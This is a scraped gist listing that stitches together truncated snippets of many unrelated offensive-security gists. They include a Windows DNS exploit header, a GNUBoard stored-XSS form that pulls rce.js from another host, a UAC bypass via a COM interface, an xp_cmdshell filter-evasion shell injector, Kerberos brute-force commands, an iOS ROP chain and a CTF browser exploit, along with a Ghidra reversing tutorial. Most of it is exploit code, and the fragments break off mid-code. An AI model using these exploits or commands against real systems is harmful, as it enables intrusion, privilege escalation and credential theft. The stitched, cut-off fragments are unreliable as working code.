Skip to content

Instantly share code, notes, and snippets.

TLDR

Cisco Security Manager is an enterprise-class security management application that provides insight into and control of Cisco security and network devices. Cisco Security Manager offers comprehensive security management (configuration and event management) across a wide range of Cisco security appliances, including Cisco ASA Adaptive Security Appliances, Cisco IPS Series Sensor Appliances, Cisco Integrated Services Routers (ISRs), Cisco Firewall Services Modules (FWSMs), Cisco Catalyst, Cisco Switches and many more. Cisco Security Manager allows you to manage networks of all sizes efficiently-from small networks to large networks consisting of hundreds of devices.

Several pre-auth vulnerabilities were submitted to Cisco on 2020-07-13 and (according to Cisco) patched in version 4.22 on 2020-11-10. Release notes didn't state anything about the vulnerabilities, security advisories were not published. All payload are processed in the context of NT AUTHORITY\SYSTEM.

#!/usr/bin/env python3
"""cve-2020-1350.py: Windows DNS Server Vulnerability"""
__author__ = "@joaovarelas"
__date__ = "July, 2020"
import binascii,socket,struct
from dnslib import *
@stypr
stypr / exploit.html
Last active February 6, 2021 15:11
GNUBoard RCE ~2019.1
<!--
Stored XSS (2019.01.02)
-->
<form action="http://10.10.10.60/gnuboard5/adm/sms_admin/form_group_update.php" method="POST">
<input type='hidden' name='fg_no' value=''>
<input type='hidden' name='fg_name' id='payload' value=''>
</form>
<script>
var random = Math.round(Math.random() * 1000000000);
var script_url = '//10.10.10.30/vulnerable_rce_good_for_reason/rce.js'; // RCE from admin
@hfiref0x
hfiref0x / akagi_58a.c
Created October 23, 2019 16:27
UAC bypass using EditionUpgradeManager COM interface
typedef interface IEditionUpgradeManager IEditionUpgradeManager;
typedef struct IEditionUpgradeManagerVtbl {
BEGIN_INTERFACE
HRESULT(STDMETHODCALLTYPE *QueryInterface)(
__RPC__in IEditionUpgradeManager * This,
__RPC__in REFIID riid,
@notdodo
notdodo / mashell.py
Last active October 14, 2020 05:45
Execute command using HEX or CHAR encoding. Bypass WAF and IPS filtering enabling RCE using xp_cmdshell: https://knifesec.com/evading-sql-injection-filters-to-get-rce/
#!/usr/bin/env python3
# Injector script to get a pseudo-interactive shell using xp_cmdshell
# Source post:
# Author: notdodo
# https://twitter.com/_d_0_d_o_
#
# USAGE: python3 ./mashell.py "whoami /priv"
#
import binascii
import hashlib
@nstarke
nstarke / 01-reversing-cisco-ios-raw-binary-firmware-images-with-ghidra.md
Last active June 5, 2024 19:01
Reversing Cisco IOS Raw Binary Firmware Images with Ghidra

Reversing Raw Binary Firmware Files in Ghidra

This brief tutorial will show you how to go about analyzing a raw binary firmware image in Ghidra.

Prep work in Binwalk

I was recently interested in reversing some older Cisco IOS images. Those images come in the form of a single binary blob, without any sort of ELF, Mach-o, or PE header to describe the binary.

While I am using Cisco IOS Images in this example, the same process should apply to other Raw Binary Firmware Images.

@ujin5
ujin5 / exploit.html
Created June 24, 2019 00:03
Google CTF Quals 2019 Monochromatic
<html>
<pre id='log'></pre>
<script src="mojo_bindings.js"></script>
<script src="third_party/blink/public/mojom/blob/blob_registry.mojom.js"></script>
<script src="being_creator_interface.mojom.js"></script>
<script src="food_interface.mojom.js"></script>
<script src="dog_interface.mojom.js"></script>
<script src="person_interface.mojom.js"></script>
<script src="cat_interface.mojom.js"></script>
<script>
@TarlogicSecurity
TarlogicSecurity / kerberos_attacks_cheatsheet.md
Created May 14, 2019 13:33
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

//#define LOCAL_EXP
#ifdef LOCAL_EXP
printf("Testing ROP chain \n");
vm_address_t payload =0x118800000;
kern_return_t kr = vm_allocate(mach_task_self(),&payload,payload_size,0);
CHECK_MACH_ERR(kr,"vm_allocate()");
memcpy((void*)payload, main_payload,payload_size);
char *buf = malloc(1000);
memset(buf,0xcc,1000);
@Jinmo
Jinmo / remote
Last active August 3, 2019 16:47
scripts
#!/bin/bash
# ./remote server port 'menu string'
touch "$1" || (echo "Cannot create file named $1" && exit 1)
exec > "$1"
echo 'from pwn import *'
echo ''
echo -e "HOST, PORT = \"$2\", \"$3\""
if [ ! -n "$HOST" ]; then HOST=0.0.0.0; fi